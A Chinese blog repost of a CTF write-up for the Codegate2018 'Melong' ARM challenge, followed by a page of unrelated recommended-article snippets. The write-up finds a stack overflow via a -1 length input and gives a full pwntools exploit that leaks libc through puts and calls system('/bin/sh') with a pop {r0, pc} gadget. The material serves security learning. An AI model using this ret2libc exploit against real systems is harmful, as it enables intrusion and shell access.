ctf-wiki ARM ROP Codegate2018_Melong题解

最新推荐文章于 2024-03-20 09:44:51 发布
最新推荐文章于 2024-03-20 09:44:51 发布
阅读量348 收藏
点赞数
原文链接:https://www.jianshu.com/p/d1d2a2ceac64
版权

写在前面

ctf-wiki关于arm pwn的arm - ROP中的例题是Codegate2018_Melong,但在网上一直没找到write up,这里跟着官方解给出的exp调试记录。

确定保护

$ file ./melong
./melong: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-, for GNU/Linux 3.2.0, BuildID[sha1]=2c55e75a072020303e7c802d32a5b82432f329e9, not stripped
$ checksec ./melong
[*] '/home/giantbranch/ctf_wiki_study/ctf-challenges/pwn/arm/Codegate2018_Melong/melong'
    Arch:     arm-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x10000)

猜测是栈溢出题目,保护机制带随机部分随机化,Partial RELRO

静态分析

首先用命令$ qemu-arm -L ./ ./melong运行程序,程序结果如下图所示:
在这里插入图片描述

典型菜单题,运行之后发现首先需要选择菜单1,计算bmi指数,之后才能选择其他功能。经测试程序的大规模文本输入点在选项4中,但是需要选项3符合一定条件才行。

You are underweight !!
1. Check your bmi
2. Exercise
3. Register personal training
4. Write daily record
5. Have some health menu
6. Out of the gym

Type the number:3
Let's start personal training
How long do you want to take personal training?
10
Check your bmi again!!
1. Check your bmi
2. Exercise
3. Register personal training
4. Write daily record
5. Have some health menu
6. Out of the gym

Type the number:4
you should take personal training first!!

将程序拖到ghidra进行静态分析,查看主函数中case 3和case 4中的情况。
在这里插入图片描述

可以看到若想到达case 4中的write_diary函数,首先需要变量local_18[0]!=0才行。
注意到case 3中:local_18[0]=PT(),进一步查看函数PT()中的内容,伪代码如下图所示:

size_t PT(void)

{
  size_t local_14;
  void *local_10;
  int local_c;
  
  puts("Let\'s start personal training");
  puts("How long do you want to take personal training?");
  __isoc99_scanf(&DAT_00011e24,&local_14);
  local_10 = malloc(local_14);
  if (local_10 == exc2) {
    puts("Okay, start to exercise!");
    local_c = 0;
    while (local_c < (int)local_14) {
      puts("you are getting healthy..");
      sleep(1);
      local_c = local_c + 1;
    }
    free(local_10);
  }
  else {
    puts("Check your bmi again!!");
    free(local_10);
    local_14 = 0;
  }
  return local_14;
}

这里没明白local_10==exc2中的exc2是什么意思。但是经测试输入-1时,在菜单4中可以写入,猜测这里是可能的溢出点。

Type the number:3
Let's start personal training
How long do you want to take personal training?
-1
Okay, start to exercise!
1. Check your bmi
2. Exercise
3. Register personal training
4. Write daily record
5. Have some health menu
6. Out of the gym

Type the number:4
dddddddd
you wrote dddddddd

尝试输入长字符:

Type the number:4
ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
you wrote ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd

1. Check your bmi
2. Exercise
3. Register personal training
4. Write daily record
5. Have some health menu
6. Out of the gym

Type the number:6
See you again :)
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Segmentation fault (core dumped)

进入gdb调试,开启两个termial
qemu-arm -L ./ -g 2222 ./melong

> gdb-multiarch ./melong
> target remote :2222

挂载调试程序崩溃时的场景,存在栈溢出。
评估栈溢出的长度,利用pwntools中的cyclic工具,偏移长度84

看到函数表中有puts函数,可以上pwn的传统工艺:
栈溢出==>puts(elf.got[‘function_name’])>计算libc基址>跳回main==>跳转到system("/bin/sh")

arm32利用gadget:pop {r0,pc}
利用ROPgadget寻找地址:

> ROPgadget --binary ./melong --only "pop"
Gadgets information
============================================================
0x000106bc : pop {fp, pc}
0x00011bbc : pop {r0, pc}
0x00010460 : pop {r3, pc}
0x000109cc : pop {r4, fp, pc}
0x000105e4 : pop {r4, pc}
0x00011408 : pop {r4, r5, pc}
0x0001173c : pop {r4, r5, r6, pc}
0x00011d28 : pop {r4, r5, r6, r7, r8, sb, sl, pc}

Unique gadgets found: 8

完成EXP如下所示:

from pwn import *
from time import sleep
import sys
context.binary = "./melong"

if sys.argv[1] == "r":
    io = remote("localhost", 9999)
elif sys.argv[1] == "l":
    io = process(["qemu-arm", "-L", "./", "./melong"])
elif sys.argv[1] == "g":
    io = process(["qemu-arm", "-g", "1239", "-L", "./", "./melong"])

elf = ELF("./melong", checksec = False)
libc = ELF("./lib/libc.so.6", checksec = False)
# context.log_level = "debug"

def check(height,weight):
    io.sendlineafter("number:","1")
    io.sendlineafter(" : ",str(height))
    io.sendlineafter(" : ",str(weight))
def register():
    io.sendlineafter("number:","3")
    io.sendlineafter(" training?\n","-1\n")

def write_record(record):
    io.sendlineafter("number:","4")
    io.send(record)
    

def log_out():
    io.sendlineafter("number:","6")

pop_r0 = 0x11bbc
check(1.82,600)
register()
payload=cyclic(100)
log_out()

payload=cyclic(84)+p32(pop_r0)+p32(elf.got['printf'])+p32(elf.plt['puts'])+p32(0x110cc)*8#
write_record(payload)
log_out()
io.recvuntil("again :)\n")
libc_address=u32(io.recvn(4))-libc.sym['printf']
success("libc_address->{:#x}".format(libc_address))
libc.address=libc_address
check(1.9,30)
register()
print("libc.search type is ",libc.search("/bin/sh"))
print(hex(libc.sym["system"]))
print(hex(next(libc.search("/bin/sh"))))
payload=cyclic(0x54)+p32(pop_r0)+p32(next(libc.search("/bin/sh")))+p32(libc.sym["system"])
write_record(payload)
log_out()
io.interactive()
flypwn
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
补充
weixin_30627381的博客
11-22 4万+
def preprocessing(text): preprocessed_text =text return preprocessed_text import csv file_path=r'C:\Users\Administrator\Desktop\SMSSpamCollectionjsn.txt' sms=open(file_path,'r',enco...
CTF pwn -- ARM架构的pwn题详解
lifanxin的博客
05-14 2750
arm架构的pwn题详解概述环境搭建使用QEMU使用gdb-multiarchARM架构基本知识一道例题参考博客总结 概述   ARM架构过去称作进阶精简指令集机器(Advanced RISC Machine,更早称作:Acorn RISC Machine),是一个32位精简指令集(RISC)处理器架构,其广泛地使用在许多嵌入式系统设计。由于节能的特点,ARM处理器非常适用于移动通讯领域,符合其主要设计目标为低耗电的特性。因此我们常用的手机、平板等移动设备都是采用ARM体系架构的,因此CTF中不可避免也会出
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
2018 【第九届蓝桥杯省赛】 C/C++ B组
qq_18841761的博客
08-03 5095
目录 第一题:第几天 第二题:明码 第三题:乘积尾零 第四题:测试次数 第五题:快速排序 第六题:递增三元组 第七题:螺旋折线 第八题:日志统计 第九题:全球变暖 第十题:乘积最大 第一题:第几天 【题目描述】 2000年的1月1日,是那一年的第1天。 那么,2000年的5月4日,是那一年的第几天? 【输出】 输出一个整数表示答案 手算即可 31 + 29 + 31 + 30 + 4 = 125 第二题:明码 【题目描述】 ...
探秘CTF-Wiki:网络安全学习的新里程
最新发布
gitblog_00044的博客
03-20 502
探秘CTF-Wiki:网络安全学习的新里程 项目地址:https://gitcode.com/ctf-wiki/ctf-wiki 在信息化社会中,网络安全的重要性不言而喻。对于爱好者和专业人士来说,参与Capture The Flag (CTF) 比赛是一种提升技能、检验知识的实际方式。【CTF-Wiki】(https://gitcode.com/ctf-wiki/ctf-wiki)就是这样一个...
ARM PWN:Codegate2018_Melong详细讲解
hollk’s blog
07-04 820
前言 在上一篇文章中我们讲解了一道ARM32静态链接的题目,本篇文章讲解的是ARM32动态链接的题目:Codegate2018_Melong。其实本质并没有什么太大的区别,仅仅只是多了一个动态链接库而已,并不会有什么影响,基本的做题思路和以往的x86类题目保持一致 往期回顾: 通过一道ARM PWN题引发的思考:jarvisOJ_typo ubuntu20.04 PWN(含x86、ARM、MIPS)环境搭建 好好说话之House Of Einherjar (补题)HITCON 2018 PWN baby_
kernel简单学习(CTF-wiki)
njh18790816639的博客
10-31 885
就从CTF WIKI的例题开始吧,此具有由易到难的特性,适合上手;
2022CTF培训(八)ARM PWN 环境搭建&ARM PWN 入门
sky123博客
12-16 1253
而 docker 镜像是根据配置文件 DockerFile 来创建的,分析 DockerFile 可知首先是拉取一个 Ubuntu16.04 的镜像并安装了相关的软件,由于安装了文件传输工具 curl ,因此可以考虑通过利用漏洞执行 curl 命令来将 flag 文件下载下来。根据 ARM 的函数调用约定,LR 寄存器存储返回地址,因此这条 gadget 中的 PC 决定 下一个函数的地址,而 LR 决定下一个函数的返回地址。qemu是一款可执行硬件虚拟化的虚拟机,与他类似的还有Bochs、PearPC,
黑客赚钱的路子有多野?CTF逆向入门指南
weixin_68789096的博客
06-18 1048
CTF比赛中, CTF逆向题目除了需要分析程序工作原理, 还要根据分析结果进一步求出FLAG。逆向在解题赛制中单独占一类题型, 同时也是PWN题的前置技能。在攻防赛制中常与PWN题结合。CTF逆向主要涉及到逆向分析和破解技巧,这也要求有较强的反汇编、反编译、加解密的功底。1、常见算法与数据结构。2、各种排序算法, 树, 图等数据结构。3、识别加密算法与哈希算法代码特征,识别算法中魔改的部分。4、代码混淆, 代码虚拟化, 修改代码流程, 反调试等。5、软件加密壳是软件保护技术的集中应用。
CTF wiki 栈基础部分学习总结
m0_57754423的博客
03-04 886
基本rop: ret2rext: 利用程序中已有的代码段。 main函数后一般跟都有leave ret; leave-> mov esp ebp;pop ebp; 函数返回值会保存在rax中; 32位程序传参是通过栈进行传参的,call一个函数的时候,此时esp所指向的位置是第一个参数,esp+4的位置是第二个参数,依次类推后跟下次函数的返回地址。 and 指令 :相同为1,不同为0。 ret2shellcode: 一般这种题目都会有rwx段,我们可以在该段内写入shellcode
CTFWiki-pwn
qq_55233040的博客
05-03 1296
stackoverflow ret2text 首先checksec一下,是32位可执行文件,没有开启保护 放入ida,shift+f12查看字符串,发现secure函数中使用system函数调用了"/bin/sh",记下地址0x804863a 查看偏移地址 脚本如下: from pwn import * io = process("./ret2text") payload = b"a"*112 + p32(0x804863a) io.sendline(payload) io.interactive(
ArmPi:适用于CTFARM逆向工程的Raspbian IMG
05-16
ArmPIv3(发布) 也称为ArmPI修订版T(ArmPIT) Raspbian IMG用于ARM逆向工程 最近我有很多CTF需要逆向工程ARM二进制文件,因此我决定现在是时候建立一种实际处理它的方法了,因此ArmPI诞生了。 .img文件是使用Raspbian LITE和Raspberry PI 0创建的。 为了获得最佳性能,请在RPI零Wifi上安装。 可能适用于RPI3,由于缺少无线卡和RNDIS小工具,因此不适用于RPI2或RPI1。 相关的Qemu和Chroot脚本也在此处,用于模拟运行。 Qemu有点慢,但是Chroot运行得很好。 尽力设法使Web服务器在Chroot中运行,对于TUI RE还是有效的。 在此存储库中,您将找到用于创建ArmPIHTML文件和脚本以及用于在Qemu中对其进行设置的配置文件。 qemu映像已在Windows 10,Kali Linux和O
ctf-field-guide.zip_ctf_pdf
09-23
ctf介绍及相关培训介绍 学习ctf的注意事项
apachecn#apachecn-ctf-wiki#BugkuCTF-WEB解题记录-11-15_weixin_3069946
07-25
BugkuCTF WEB解题记录 11-15_weixin_30699463的博客-CSDN博客来源:
apachecn#apachecn-ctf-wiki#[WP/BUU/CTF]Cookie-Store-题解_車鈊的博客-CSD
07-25
来源:,涉及Cookie的使用方法操作方
ctf-wikiCTF Wiki的新起点! 快来加入我们,我们需要您!
02-04
CTF维基 欢迎使用CTF WikiCTF (Capture The Flag)是从DEFCON CTF开始的, DEFCON CTF是计算机安全爱好者之间的竞争性游戏,最初于1996年举办。 CTF涵盖了广泛的领域。 随着安全技术的不断发展, CTF挑战的难度...
2018年第八届C/C++ B组蓝桥杯省赛真题
LXYDSF的博客
04-06 2111
2018年第八届C/C++ B组蓝桥杯省赛真题
codegate-2020 renderer
CODER的博客
02-11 415
利用nginx配置不当导致的目录遍历漏洞泄漏出文件 http://58.229.253.144/static../src/uwsgi.ini [uwsgi] chdir = /home/src module = run callable = app processes = 4 uid = www-data gid = www-data socket = /tmp/renderer.sock chm...
强网杯2018_core
z1r0的博客
03-21 823
强网杯2018_core 具体可以看z1r0’s blog 题目拿到手就是一个tar包。解压 ➜ 2018强网杯-core tar -xvf core_give.tar give_to_player/ give_to_player/bzImage give_to_player/core.cpio give_to_player/start.sh give_to_player/vmlinux ➜ 2018强网杯-core ls core_give.tar give_to_player ➜ 2018强网
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值